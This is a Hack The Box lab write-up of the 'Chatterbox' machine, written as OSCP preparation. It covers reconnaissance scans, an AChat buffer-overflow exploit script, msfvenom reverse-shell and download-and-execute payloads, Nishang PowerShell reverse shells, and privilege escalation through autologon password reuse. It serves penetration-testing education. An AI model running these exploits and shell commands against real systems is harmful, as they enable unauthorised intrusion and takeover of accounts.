Hack The Box: Chatterbox Write-up (#41)

This is my 41st box out of 42 boxes for OSCP preparation. I am doing my best learning and mastering the key skills for my upcoming OSCP exams by writing this series of blogs. So let’s begin.

Reconnaissance

Run the nmapAutomator script to enumerate open ports and services running on those ports.

./nmapAutomater 10.10.10.74 All
  • All: Runs all the scans consecutively (~20–30 minutes)

We get the back the following result:

Running all scans on 10.10.10.74

Host is likely running Windows
---------------------Starting Nmap Quick Scan---------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 09:11 +08
Nmap done: 1 IP address (1 host up) scanned in 101.80 seconds
---------------------Starting Nmap Basic Scan---------------------

No ports in quick scan.. Skipping!



----------------------Starting Nmap UDP Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 09:12 +08
Nmap scan report for 10.10.10.74
Host is up.
All 1000 scanned ports on 10.10.10.74 are open|filtered
Nmap done: 1 IP address (1 host up) scanned in 201.70 seconds---------------------Starting Nmap Full Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 09:16 +08
Initiating Parallel DNS resolution of 1 host. at 09:16
Completed Parallel DNS resolution of 1 host. at 09:16, 0.20s elapsed
Initiating SYN Stealth Scan at 09:16
Scanning 10.10.10.74 [65535 ports]
SYN Stealth Scan Timing: About 0.46% done
SYN Stealth Scan Timing: About 0.91% done
SYN Stealth Scan Timing: About 1.37% done; ETC: 11:07 (1:49:32 remaining)
SYN Stealth Scan Timing: About 5.73% done; ETC: 11:06 (1:43:56 remaining)
SYN Stealth Scan Timing: About 10.52% done; ETC: 11:06 (1:38:22 remaining)
Discovered open port 9255/tcp on 10.10.10.74
SYN Stealth Scan Timing: About 14.08% done; ETC: 10:58 (1:27:58 remaining)
SYN Stealth Scan Timing: About 38.99% done; ETC: 09:54 (0:23:21 remaining)
Discovered open port 9256/tcp on 10.10.10.74
SYN Stealth Scan Timing: About 67.36% done; ETC: 09:39 (0:07:28 remaining)
Completed SYN Stealth Scan at 09:32, 956.54s elapsed (65535 total ports)
Nmap scan report for 10.10.10.74
Host is up (0.022s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
9255/tcp open mon
9256/tcp open unknown
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 956.81 seconds
Raw packets sent: 131139 (5.770MB) | Rcvd: 972 (78.808KB)
Making a script scan on all ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 09:32 +08
Nmap scan report for 10.10.10.74
Host is up (0.021s latency).
PORT STATE SERVICE VERSION
9255/tcp open http AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open achat AChat chat system
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.29 seconds
---------------------Starting Nmap Vulns Scan---------------------

Running CVE scan on all ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 09:32 +08
Nmap scan report for 10.10.10.74
Host is up (0.0084s latency).
PORT STATE SERVICE VERSION
9255/tcp open http AChat chat system httpd
|_http-server-header: AChat
9256/tcp open achat AChat chat system
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.50 seconds
Running Vuln scan on all ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 09:32 +08
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.74
Host is up (0.0074s latency).
PORT STATE SERVICE VERSION
9255/tcp open http AChat chat system httpd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: AChat
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
9256/tcp open achat AChat chat system
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.50 seconds
---------------------Recon Recommendations----------------------Web Servers Recon:

gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.php -u http://10.10.10.74:9255 -o recon/gobuster_10.10.10.74_9255.txt
nikto -host 10.10.10.74:9255 | tee recon/nikto_10.10.10.74_9255.txt
Which commands would you like to run?
All (Default), gobuster, nikto, Skip <!>
Running Default in (1) s:---------------------Running Recon Commands----------------------Starting gobuster scan

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.74:9255
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: html,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/09/13 09:33:50 Starting gobuster
===============================================================
http://10.10.10.74:9255/favicon.ico (Status: 200) [Size: 1078]

===============================================================
2020/09/13 09:34:16 Finished
===============================================================
Finished gobuster scan

=========================

Starting nikto scan

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.74
+ Target Hostname: 10.10.10.74
+ Target Port: 9255
+ Start Time: 2020-09-13 09:34:31 (GMT8)
---------------------------------------------------------------------------
+ Server: AChat
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ 7881 requests: 10 error(s) and 4 item(s) reported on remote host
+ End Time: 2020-09-13 09:40:31 (GMT8) (360 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Finished nikto scan

=========================



---------------------Finished all Nmap scans---------------------
Completed in 29 minute(s) and 25 second(s)

We have two ports open.

  • Port 9255: — Running HTTP, AChat chat system
  • Port 9256: — Running AChat chat system httpd

Before we begin enumeration, let's make quick mental notes.

  1. The moment I noticed Nmap scan results running HTTP service on port 9255, I tried to access this port from the browser and it just returned a blank page. Nothing much I can find useful. Even gobuster scan result returned nothing useful.
  2. From the result of the Nmap scan, Port 9255 and 9256 are components of AChat system. Is a Windows software, that is part of the category Communication software with subcategory Instant Messaging (more specifically Local Network Clients). We might need to find exploits for this software and try to exploit it. The vulnerability exists in the software might give us an initial foothold to the target machine.

Let’s begin.

Service Enumeration

Port 9255 and 9256 (AChat chat system)

Search exploits for the searchsploit for AChat software.

searchsploit AChat

We get back the following results.

The first one seems promising and is written in Python. The version of the software is vulnerable to buffer overflow attack. The thing is we don't have version info of running AChat system in the target machine. But no harm to try since only one exploit we like to test. Download it to your Kali Linux current working directory and rename it as exploit.py

searchsploit -m windows/remote/36025.py
...
mv 36025.py exploit.py

Review the code. The author of the exploit commented on how to generate the payload. The payload is for x86 architecture (x32-bit) Windows OS. We don’t know the target OS details yet. But for sure we know it is running Windows OS. The nice part is bad chars are included. This payload is just to create calc.exe executable in the target once successfully exploited. For us we need a reverse shell payload, we’ll modify this later with additional argument EXITFUNC=thread. This argument is used in most exploitation scenarios where the exploited process (e.g. AChat system) runs the shellcode in a sub-thread and exiting this thread results in a working application/system (clean exit).

...
# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
#Payload size: 512 bytes
...

Next, the generated payload send to target via UDP socket on port 9256. So here we need to change the target IP address to 10.10.10.74.

...
buf = ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
...
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('192.168.91.130', 9256)
fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"
print "---->{P00F}!"
i=0
while i<len(p):
if i > 172000:
time.sleep(1.0)
sent = sock.sendto(p[i:(i+8192)], server_address)
i += sent
sock.close()

That is it. Let’s test them out.

Exploitation

Generate reverse shell payload.

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp lhost=10.10.14.31 lport=53 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX EXITFUNC=thread -f python

Copy the output and replace in the exploit code. Next, change the IP address.

...
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('10.10.10.74', 9256)
...

Save the code.

Set up a Netcat listener on your Kali Linux.

nc -nlvp 53

Run the exploit code.

python exploit.py

Check back the listener.

Great! the exploit works and we get a shell. Grab the user flag.

Post-Exploitation Enumeration

Gather the OS details with the systeminfo command.

Now we’re sure target is running x86-based Windows 7 Professional SP1. Else the exploit will not works. If you noticed, it has many patches installed. Very less chance to exploit kernel. Anyhow we still need the output and analyse when others didn't turn around. Let’s copy the output and save on our Kali Linux.

Next, check user privileges.

Nothing interesting here. Check user account information.

Next, check all the users in the system.

Let’s see if we have access to Administrator directory.

We do have access. But we don't have permission to read the content of the root.txt flag. Let’s check the permission of the root.txt file.

Only Administrator has full access (F) on this file. Let’s view the permission on the Administrator’s Desktop directory. Since we are able to enter this directory, we must have some kind of permission.

We have full access (F) on the Desktop directory. The Alfred user is also configured to own the root.txt file.

So we can simply grant ourselves access to it using the following command.

View the permission again to confirm that the changes was made.

We should now able to view the root.txt flag.

We’re able to read the flag without escalating privilege. In the next phase, we’ll start from the beginning and send PowerShell reverse shell back to our target machine and from there we’ll escalate privilege to Administrator.

Privilege Escalation

Download the Nishang repository and copy the Invoke-PowerShellTcp.ps1 script into your current directory.

cp ../../opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell.ps1

Add the following line to the end of the script with the Kali Linux machine configuration settings.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.31 -Port 53

When called, this sends a reverse shell back to our Kali Linux on port 53.

Set up a Netcat listener on Kali Linux.

nc -nlvp 53

Next, use msfvenom to generate a payload that downloads the PowerShell script and executes it.

msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.31/shell.ps1')" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX EXITFUNC=thread -f python

We get back the following output.

Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 676 (iteration=0)
x86/unicode_mixed chosen with final size 676
Payload size: 676 bytes
Final size of python file: 3287 bytes
buf = b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
...

The payload size is not so big. Copy the payload and add it in place of the payload included in the exploit.

Startup a python server in the directory that the PowerShell script resides in.

python3 -m http.server 80

Run the exploit.

python exploit.py

We get a PowerShell shell!

We’ll use PowerUp.ps1 script to identify if there any misconfiguration that leads to privilege escalation.

Upload and run the script on the target machine.

PS C:\Windows\system32> iex(new-object net.webclient).downloadstring('http://10.10.14.31/PowerUp.ps1')PS C:\Windows\system32> Invoke-AllChecks

We get back the following results.

[*] Checking for Autologon credentials in registry...DefaultDomainName    : 
DefaultUserName : Alfred
DefaultPassword : Welcome1!
AltDefaultDomainName :
AltDefaultUserName :
AltDefaultPassword :
...
[*] Checking for unattended install files...UnattendPath : C:\Windows\Panther\Unattend.xml

Viewing the Unattend.xml file, we see that the password was redacted. So let’s focus on the Autologon credentials. The default username is “Alfred” and the default password is “Welcome1!”. We can confirm this by checking manually with the following command.

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Autologon credentials are set by the Administrator. Since users have a tendency to reuse the passwords, let’s see if the administrator account is set to the same password.

First, run the following command to convert the plain text string “Welcome1!” into a secure string and store the result in the $password variable.

$password = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
  • ConvertTo: Convert the plain text to secure strings.
  • -AsPlainText: Specifies a plain text to convert to a secure string.
  • -Force: Confirms that you understand the implications of the using the AsPlainText parameter and still want to use it.

Second, create a new object to store these credentials.

$cred = New-Object System.Management.Automation.PSCredential('Administrator',$password)

Third, we’ll use these credentials to start PowerShell and send a reverse shell back to our Kali Linux.

In the Kali Linux, copy the shell.ps1 script we used earlier and save it as shell-admin.ps1.

cp shell.ps1 shell-admin.ps1

Change shell-admin.ps1 to send a reverse shell to our Kali Linux machine on port 443.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.31 -Port 443

Setup a python web server in the directory that the script resides in.

python3 -m http.server 80

Set up a listener to receive the reverse shell.

nc -nlvp 443

On the target machine, use the credentials to start PowerShell to download the shell-admin.ps1, run it and send a reverse shell back to our Kali Linux.

Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell-admin.ps1')" -Credential $cred

We get a shell with administrator privileges!

Attack Strategy Map

I have summarized the entire attack strategy on this map.

Thank you for reading :-) Next box is Forest.

--

--

--

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Learn Web Scraping using Python in under 5 minutes

[Project_blog] Why readers cannot see list of articles in Medium?

Helping people learn through peer to peer learning: part 1

Esportsref progress update

Monitoring Streaming Data Using AWS Kinesis Data Analytics

Inside OutSystems Engineering — Morgan Logue, Engineering Fellow and Director of Architecture

Jenkins And Its Use Cases…

Approaching Technical Interviews

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Joshua Surendran

Joshua Surendran

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.

More from Medium

Pico CTF Web Exploitation

🐱‍💻 The eWPT Review🔍

Hack The Box — Unified

LAME HTB — Walkthrough & cve-2007–2447 explained